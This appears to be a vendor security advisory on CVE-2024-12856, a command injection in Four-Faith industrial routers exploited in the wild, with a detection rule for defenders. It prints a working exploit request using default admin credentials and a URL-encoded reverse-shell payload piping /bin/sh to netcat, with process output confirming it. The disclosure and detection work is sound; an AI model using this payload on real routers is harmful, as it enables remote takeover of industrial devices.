VulnCheck observed a new post-authentication vulnerability affecting Four-Faith industrial routers being exploited in the wild. The attacker leveraged the router’s default credentials, effectively resulting in unauthenticated remote command injection. VulnCheck has assigned this issue CVE-2024-12856.
The attack can be conducted against, at least, the Four-Faith F3x24 and F3x36 over HTTP using the /apply.cgi endpoint. Censys finds approximately 15,000 internet-facing devices. The systems are vulnerable to OS command injection in the adj_time_year parameter when modifying the device’s system time via submit_type=adjust_sys_time. The following POST request demonstrates exploitation for a reverse shell.
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1:90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Length: 296
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time
On the device, the result of the injection can be observed using ps:
20938 admin 1640 S sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20940 admin 1640 S sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20942 admin 1636 S cat WaO
20943 admin 1636 S /bin/sh -i
20945 admin 1636 S nc 192.168.1.206 1270
For those that have an encyclopedic memory for exploits, this vulnerability should not be confused with CVE-2019-12168. While both flow through the apply.cgi endpoint, they attack different underlying components (CVE-2019-12168 attacks submit_type=start and has an OS injection in the ping_ip parameter).
VulnCheck observed 178.215.238[.]91 attempting to exploit this vulnerability. Additionally, we note that this November 2024 blog also calls out exploitation of this vulnerability. Their observed User-Agent even matches the User-Agent VulnCheck observed in the wild (although we saw an entirely different payload).
The VulnCheck Initial Access team wrote the following Suricata rule to detect CVE-2024-12856 on the wire:
alert http any any -> any any ( \
msg:"VULNCHECK Four-Faith CVE-2024-12856 Exploit Attempt"; \
flow:to_server; \
http.method; content:"POST"; \
http.uri; content:"/apply.cgi"; startswith; \
http.header_names; content:"Authorization"; \
http.request_body; content:"change_action="; \
content:"adjust_sys_time"; \
pcre:"/adj_time_[^=]+=[a-zA-Z0-9]*[^a-zA-Z0-9=]/"; \
classtype:web-application-attack; \
reference:cve,CVE-2024-12856; \
sid:12700438; rev:1;)
Finally, pursuant to our vulnerability disclosure policy for vulnerabilities exploited in the wild, we notified Four-Faith and our customers about this issue on December 20, 2024. Questions about patches, affected models, and affected firmware versions should be directed at Four-Faith.
About VulnCheck
The VulnCheck Initial Access team is always on the lookout for new exploitation in the wild. For more research like this, see our blogs, PaperCut Exploitation, ProjectSend CVE-2024-11680 Exploited in the Wild, Fileless Remote Code Execution on Juniper Firewalls , and Does Confluence Dream of Shells?
Sign up to our website today to get free access to our VulnCheck KEV and request a trial of our Initial Access Intelligence and Exploit & Vulnerability Intelligence products.